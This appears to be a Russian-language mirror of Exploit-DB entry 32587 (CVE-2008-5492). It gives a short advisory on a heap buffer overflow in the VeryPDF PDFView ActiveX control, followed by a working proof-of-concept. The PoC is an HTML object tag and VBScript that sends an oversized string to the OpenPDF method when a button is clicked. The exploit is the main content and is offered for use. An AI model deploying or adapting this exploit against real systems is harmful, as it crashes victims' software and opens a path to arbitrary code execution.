- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 32587
- Проверка EDB
-
- Пройдено
- Автор
- R0UT3R
- Тип уязвимости
- DOS
- Платформа
- WINDOWS
- CVE
- cve-2008-5492
- Дата публикации
- 2008-11-15
Код:
source: https://www.securityfocus.com/bid/32313/info
The VeryPDF PDFView ActiveX control is prone to a heap buffer-overflow vulnerability because it fails to properly bounds-check user-supplied data before copying it into an insufficiently sized memory buffer.
An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in denial-of-service conditions.
<object classid='clsid:433268D7-2CD4-43E6-AA24-2188672E7252' id='target'></object> <script language='vbscript'> Sub Boom buff = String(1006, "A") target.OpenPDF buff, 1, 1 End Sub </script> <input type=button onclick=Boom() value='Boom?'>
- Источник
- www.exploit-db.com